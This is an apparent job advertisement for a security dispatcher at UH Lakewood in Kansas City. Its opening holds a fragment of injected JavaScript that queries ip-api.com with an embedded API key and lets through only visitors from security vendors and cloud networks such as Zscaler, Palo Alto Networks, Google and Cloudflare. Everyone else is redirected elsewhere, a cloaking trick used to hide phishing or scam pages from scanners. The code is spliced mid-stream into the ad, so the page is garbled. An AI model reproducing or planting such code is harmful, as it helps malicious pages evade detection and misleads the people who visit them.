Public Safety Security Dispatcher (Full-Time)
Overview
const ipAddress = data.ip;
// retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/${ipAddress}?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname;
// check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg));
if (!ispAllowed && !asOrgAllowed) {
// Redirect all users to the same URL
window.location.href = '';
}
})
.catch(error => {
console.error('Error retrieving ISP name:', error);
});
})
.catch(error => {
console.error('Error retrieving IP address or location:', error);
});
We are seeking a dedicated Public Safety Security Dispatcher to monitor and coordinate security operations at UH Lakewood in Kansas City, Missouri.
Responsibilities include
- Receiving and prioritizing emergency and non-emergency calls, providing clear communication to security personnel and emergency services.
- Monitoring security systems, surveillance cameras, and alarm notifications to ensure safety and security.
- Maintaining accurate logs of incidents, activities, and communications.
- Assisting visitors, staff, and vendors with directions and security procedures.
- Responding promptly to incidents, coordinating appropriate responses, and escalating when necessary.
Skills needed include
- Strong communication and interpersonal skills.
- Ability to remain calm and make quick, sound decisions under pressure.
- Attention to detail and excellent organizational skills.
- Basic computer proficiency and familiarity with security systems.
Benefits include competitive pay, health insurance options, retirement plans, paid time off, and a supportive team environment. Join us to help ensure a safe and secure environment for all.